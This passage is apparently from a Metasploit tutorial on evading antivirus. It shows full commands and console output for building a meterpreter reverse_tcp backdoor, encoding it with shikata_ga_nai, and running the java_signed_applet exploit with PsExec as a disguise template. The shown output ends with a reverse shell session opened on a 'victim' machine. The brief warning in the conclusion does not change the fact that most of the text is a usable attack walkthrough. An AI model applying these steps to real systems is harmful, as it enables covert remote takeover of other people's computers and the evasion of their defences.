root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > Desktop/meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
root@bt:~#

 

You can see that the most common and famous anti-viruses have detected some malware in a file. It is therefore not a good practice to send this file to the victim, since an anti-virus can easily detect it.

Example with Encoder

In this example I will use an encoder so that the backdoor will easily be able to bypass anti-viruses. Here’s how to begin:

 root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X | msfencode -c 1 -e x86/shikata_ga_nai > Desktop/meterpreter_1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}
[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1) 

root@bt:~#

 


Now you can easily see the difference between these two results.

Bypass An Anti-virus during Exploitation

Now consider the other side of the picture: automated exploitation runs into a problem when the operating system is vulnerable and you are able to take control of it, but an enabled anti-virus then blocks the payload. Here is another example:

msf > use exploit/multi/browser/java_signed_applet
msf  exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(java_signed_applet) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf  exploit(java_signed_applet) > exploit
[*] Exploit running as background job. 

[*] Started reverse handler on 192.168.1.12:4444
[*] Using URL: http://0.0.0.0:8080/bOX4eN
[*]  Local IP: http://192.168.1.12:8080/bOX4eN
[*] Server started.
msf  exploit(java_signed_applet) > [*] Handling request from 192.168.1.12:39663...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Generated executable to drop (37888 bytes).
[*] Compiling applet classes...
[*] Compile completed.  Building jar file...
[*] Jar built.  Signing...
[*] Jar signed.  Ready to send.

The victim’s computer runs Windows with AVG anti-virus enabled, and no session was opened. Although the victim is vulnerable, the attack fails because of the anti-virus. Now I will change the scenario slightly: Metasploit uses a default template.exe when it generates the executable, and to bypass an anti-virus we need to use a custom Windows executable instead.

What about telnet, or the other ports available for remote desktop connections? PsTools is a toolkit of an entirely different kind: command-line tools for administrative purposes. PsExec is among these tools; it is a utility that allows you to execute programs on a remote system. Its executable is used here as the template:

msf exploit(java_signed_applet) > set Template /tmp/pstools/psexec.exe
Template => /tmp/pstools/psexec.exe
msf  exploit(java_signed_applet) > exploit
[*] Exploit running as background job. 

[*] Started reverse handler on 192.168.1.12:4444
[*] Using URL: http://0.0.0.0:8080/bOX4eN
[*]  Local IP: http://192.168.1.12:8080/bOX4eN
[*] Server started. 

msf  exploit(java_signed_applet) > [*] Handling request from 192.168.1.12:39663...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Sending SiteLoader.jar to 192.168.1.12.  Waiting for user to click 'accept'...
[*] Generated executable to drop (37888 bytes).
[*] Compiling applet classes...
[*] Compile completed.  Building jar file...
[*] Jar built.  Signing...
[*] Jar signed.  Ready to send.
[*] Sending stage (748032 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.8:5807) 

msf exploit(java_signed_applet) > sessions -i 1
[*] Starting interaction with 1...


This example shows that encoding is not the only way to bypass anti-virus software: an anti-virus can also be fooled by building the payload on top of a legitimate file.

Conclusion


There are some wonderful tutorials and techniques available for bypassing anti-virus software. Among them are crypters, wrappers and other tools readily found on the internet, but downloading such files from an unknown source is not recommended. Some people use these techniques to take advantage of the innocent, so when you download and install such a file, keep in mind that there is a chance your computer will be put at risk of some sort of malware or backdoor attack.


Last but not least, never trust an unknown source. Otherwise, you can become the next victim, whether you have an anti-virus or not – now that you have seen how easy it is to bypass them.


